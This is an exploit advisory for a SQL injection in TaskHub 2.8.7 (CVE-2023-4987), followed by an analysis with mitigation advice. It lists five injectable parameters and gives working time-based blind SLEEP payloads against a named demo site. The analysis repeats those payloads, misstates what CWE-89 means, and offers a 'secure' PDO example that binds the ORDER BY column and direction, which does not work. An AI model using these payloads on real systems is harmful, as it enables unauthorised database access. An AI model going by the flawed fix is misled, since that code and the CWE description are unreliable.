taskhub 2.8.7 - SQL Injection

Exploit Author: CraCkEr Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2024-02-26 
# Exploit Title: taskhub 2.8.7 - SQL Injection
# Exploit Author: CraCkEr
# Date: 05/09/2023
# Vendor: Infinitie Technologies
# Vendor Homepage: https://www.infinitietech.com/
# Software Link: https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874
# Demo: https://taskhub.company/auth
# Tested on: Windows 10 Pro
# Impact: Database Access
# CVE: CVE-2023-4987
# CWE: CWE-89 - CWE-74 - CWE-707


## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob


## Description

SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.


Path: /home/get_tasks_list

GET parameter 'project' is vulnerable to SQL Injection
GET parameter 'status' is vulnerable to SQL Injection
GET parameter 'user_id' is vulnerable to SQL Injection
GET parameter 'sort' is vulnerable to SQL Injection
GET parameter 'search' is vulnerable to SQL Injection


https://taskhub.company/home/get_tasks_list?project=[SQLi]&status=[SQLi]&from=&to=&workspace_id=1&user_id=[SQLi]&is_admin=&limit=10&sort=[SQLi]&order=&offset=0&search=[SQLi]


---
Parameter: project (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: project='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=

Parameter: status (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: project=&status='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=

Parameter: user_id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: project=&status=&from=&to=&workspace_id=1&user_id=(SELECT(0)FROM(SELECT(SLEEP(8)))a)&is_admin=&limit=10&sort=id&order=desc&offset=0&search=

Parameter: sort (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=(SELECT(0)FROM(SELECT(SLEEP(6)))a)&order=desc&offset=0&search=

Parameter: search (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=') AND (SELECT(0)FROM(SELECT(SLEEP(7)))a)-- wXyW
---


[-] Done


TaskHub 2.8.7 SQL Injection Vulnerability: A Deep Dive into CVE-2023-4987

Security vulnerabilities in web applications continue to pose significant risks to organizations worldwide. One such critical flaw recently exposed in TaskHub 2.8.7, a project management and CRM tool developed by Infinitie Technologies, highlights the dangers of improper input sanitization. This vulnerability, identified as CVE-2023-4987 and classified under CWE-89 (Improper Neutralization of Input During Web Output), allows attackers to execute arbitrary SQL commands through multiple GET parameters.

Exploit Overview

The vulnerability exists in the /home/get_tasks_list endpoint, which is used to retrieve task data based on user-defined filters. Multiple parameters — project, status, user_id, sort, and search — are susceptible to SQL injection attacks. The exploit was discovered and reported by cybersecurity researcher CraCkEr on September 5, 2023.

Attackers can leverage time-based blind SQL injection techniques to confirm the presence of vulnerabilities without direct output, making detection difficult for standard security tools. The payload uses SLEEP() functions to induce delays, allowing attackers to infer whether the query was executed successfully based on response time.

Attack Vector: Time-Based Blind SQL Injection

Time-based blind SQL injection is a stealthy technique where an attacker injects a payload that causes the database to delay execution, typically by calling SLEEP(n) where n is the number of seconds to delay. If the server response time increases significantly, it confirms that the injection was processed.

project='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=

This payload exploits the project parameter. The XOR operator is used to wrap the SQL query in a way that maintains syntactic validity while ensuring the SLEEP(8) function is executed. The SELECT(0)FROM(SELECT(SLEEP(8)))a part forces the database to pause for 8 seconds, which can be observed via network latency.

Parameter-Specific Exploitation

Each of the five vulnerable parameters can be exploited independently, allowing attackers to probe the database structure and extract sensitive information. Below is a breakdown of how each parameter can be targeted:

Parameter Injection Type Example Payload Impact
project Time-based blind project='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z Delay-based confirmation of SQL execution
status Time-based blind status='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z Verify SQL injection capability
user_id Time-based blind user_id=(SELECT(0)FROM(SELECT(SLEEP(8)))a) Extract user data via delay timing
sort Time-based blind sort=(SELECT(0)FROM(SELECT(SLEEP(6)))a) Test sorting logic vulnerability
search Time-based blind search=') AND (SELECT(0)FROM(SELECT(SLEEP(7)))a)-- wXyW Exploit search query with comment bypass

For the search parameter, the payload uses ') to close an existing string, followed by AND (SELECT(0)FROM(SELECT(SLEEP(7)))a) and -- wXyW to comment out the remainder of the query. This ensures the injected SQL is executed while avoiding syntax errors.

Real-World Impact and Risk Assessment

SQL injection vulnerabilities in a project management tool like TaskHub can lead to severe consequences:

  • Database Access: Attackers can extract user credentials, task details, financial records, and internal communications.
  • Data Modification: Unauthorized changes to task statuses, user roles, or project timelines can disrupt workflows.
  • Application Crash: Malformed queries can overload the database, causing service outages and loss of productivity.
  • Reputation Damage: Breaches involving sensitive business data can lead to legal liabilities and loss of client trust.

Given that TaskHub is marketed as a CRM, finance, and project management tool, it likely stores confidential data across multiple domains — making this vulnerability particularly dangerous for small and medium-sized enterprises (SMEs).

Expert Recommendations for Mitigation

Organizations using TaskHub or similar software must take immediate action to address this vulnerability:

  • Input Validation: Implement strict input sanitization using whitelisting or parameterized queries.
  • Use Prepared Statements: Replace dynamic SQL queries with prepared statements to prevent injection.
  • Apply Web Application Firewalls (WAF): Deploy WAFs to detect and block SQL injection patterns in real time.
  • Regular Penetration Testing: Conduct routine security audits to identify and remediate vulnerabilities early.
  • Update Software: Upgrade to the latest version of TaskHub, or apply vendor-provided patches if available.

Improved Secure Code Example

Here is a corrected, secure implementation of the query logic using parameterized SQL in PHP:


// Secure approach using PDO with prepared statements
$stmt = $pdo->prepare("
    SELECT * FROM tasks 
    WHERE project = :project 
    AND status = :status 
    AND user_id = :user_id 
    AND (search LIKE :search OR search IS NULL)
    ORDER BY :sort :order
    LIMIT :limit OFFSET :offset
");

$stmt->bindParam(':project', $project, PDO::PARAM_STR);
$stmt->bindParam(':status', $status, PDO::PARAM_STR);
$stmt->bindParam(':user_id', $user_id, PDO::PARAM_INT);
$stmt->bindParam(':search', $search, PDO::PARAM_STR);
$stmt->bindParam(':sort', $sort, PDO::PARAM_STR);
$stmt->bindParam(':order', $order, PDO::PARAM_STR);
$stmt->bindParam(':limit', $limit, PDO::PARAM_INT);
$stmt->bindParam(':offset', $offset, PDO::PARAM_INT);

$stmt->execute();

This approach eliminates the risk of SQL injection by separating data from code. The bindParam function ensures that user input is treated as data, not executable code. Even if an attacker injects malicious payloads, the database will not interpret them as commands.

Conclusion

The TaskHub 2.8.7 SQL Injection vulnerability serves as a stark reminder that even seemingly benign web applications can harbor critical security flaws. Developers and administrators must prioritize secure coding practices, input validation, and proactive monitoring. By adopting modern security standards such as parameterized queries and WAFs, organizations can significantly reduce the risk of data breaches and operational disruptions.

For users of TaskHub, immediate action is advised: upgrade to a patched version or implement additional security layers until a fix is released. The CVE-2023-4987 remains a high-risk threat until remediated.